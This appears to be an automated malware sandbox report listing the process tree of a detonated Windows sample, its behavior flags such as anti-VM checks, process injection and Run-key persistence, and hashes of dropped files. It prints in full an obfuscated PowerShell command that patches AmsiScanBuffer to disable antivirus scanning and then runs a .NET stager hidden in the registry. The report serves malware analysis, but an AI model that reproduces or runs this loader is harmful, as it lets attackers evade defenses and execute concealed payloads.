C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AQEQSsXneEVd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zqPrIoOTgjIPwx,[Parameter(Position=1)][Type]$pcFHOpjewr)$umAguEtgBgl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+'l'+[Char](101)+'ga'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+'ry'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+'te'+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+'s'+''+'i'+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'oCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$umAguEtgBgl.DefineConstructor(''+'R'+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+'l'+'N'+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$zqPrIoOTgjIPwx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+''+'d'+'');$umAguEtgBgl.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+'S'+'ig'+','+'N'+[Char](101)+'wSl'+'o'+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$pcFHOpjewr,$zqPrIoOTgjIPwx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+'Man'+'a'+'ged');Write-Output $umAguEtgBgl.CreateType();}$uhJvvrezRzuZQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+'t.'+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+'M'+'eth'+'o'+'ds');$fuacyMnXZyCvLd=$uhJvvrezRzuZQ.GetMethod(''+[Char](71)+'e'+[Char](116)+'Pr'+[Char](111)+'cA'+'d'+'d'+'r'+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jGSjWxrSbdJNDWHInaa=AQEQSsXneEVd @([String])([IntPtr]);$sUfVPzqStEVQDePjsPTKzV=AQEQSsXneEVd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gjGdSBXvWOQ=$uhJvvrezRzuZQ.GetMethod('G'+'e'+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+'nel'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$FiDHRsfwfuHrfE=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$gjGdSBXvWOQ,[Object](''+'L'+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+'i'+'b'+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+'A'+'')));$MHGVGDORDxlWFsHcz=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$gjGdSBXvWOQ,[Object](''+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+'o'+'t'+''+[Char](101)+'c'+'t'+'')));$fYfmJEK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FiDHRsfwfuHrfE,$jGSjWxrSbdJNDWHInaa).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+[Char](100)+''+'l'+''+[Char](108)+'');$EHhzRrJOiEyzmxvjT=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$fYfmJEK,[Object]('A'+'m'+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$ttmblTvobe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MHGVGDORDxlWFsHcz,$sUfVPzqStEVQDePjsPTKzV).Invoke($EHhzRrJOiEyzmxvjT,[uint32]8,4,[ref]$ttmblTvobe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EHhzRrJOiEyzmxvjT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MHGVGDORDxlWFsHcz,$sUfVPzqStEVQDePjsPTKzV).Invoke($EHhzRrJOiEyzmxvjT,[uint32]8,0x20,[ref]$ttmblTvobe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+'7'+''+[Char](55)+'s'+[Char](116)+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3364
-
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:484
-
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1288
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1516
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2996
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2072
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2616
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3044
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3196
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3380
-
C:\Users\Admin\AppData\Local\Temp\a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe"C:\Users\Admin\AppData\Local\Temp\a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"4⤵
- Executes dropped EXE
PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe"C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe"6⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\$7760c8f0"C:\Users\Admin\AppData\Local\Temp\$7760c8f0"7⤵
- Executes dropped EXE
PID:3368
-
-
C:\Users\Admin\AppData\Local\Temp\$772f9fd5"C:\Users\Admin\AppData\Local\Temp\$772f9fd5"7⤵
- Executes dropped EXE
PID:4412
-
-
-
-
-
C:\Users\Admin\1000006002\18571080f2.exe"C:\Users\Admin\1000006002\18571080f2.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2824
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3600
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3928
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4000
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4072
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4204
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3444
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3024
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2196
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2964
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4100
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.1MB
MD51c7a02bb53ab156eb200122c93dde12f
SHA14b52e8d87ce511b05aa619a782e14f7e6625f37c
SHA256c9b4047be7c4b7190533db32c67b85fe51c1692cca1d36944ad2f4d554b9320a
SHA51272a7d5002a6972b3a7a5230cf68a54760ab282e43838cc27053dbf39eaf1bbfb370c83080a68544ae523ddeefa3e1a53fd46b9ac8715b1b74747933060061b8f
-
Filesize
1.9MB
MD56e14c3b7c3374ca36a6a193eecbe6ff3
SHA1481b77201a9abe4ee619642aa34048b813d940eb
SHA256433c09a91cf3b14922f0f1f7833cfc172c3752c38a9fee67a42dd8b4f3dc1a51
SHA512f3cdaaad74f2e855e0144a93eb0751c54dd7d2fc615f08f9c52c6b11f3fcb01bccee283eec92ac2776aba5793b8290fa94842e7480713985aad355ee29a44a99
-
Filesize
4.5MB
MD5133fda00a490e613f3a6c511c1c660eb
SHA1e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
SHA512f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
-
Filesize
1.5MB
MD532187c18a470b54095365f8db359a671
SHA13ce7f687006e176a5b1554e30decdfed60e35aae
SHA256a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948
SHA512a9873b6ac3f480ad881bee4fe52d960127696f816007ee1ed4a2511ff82f7cc10ec98ef16cdc2869b49b716d3453ee6a7d952a1988083d046ba05dd9d579449a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82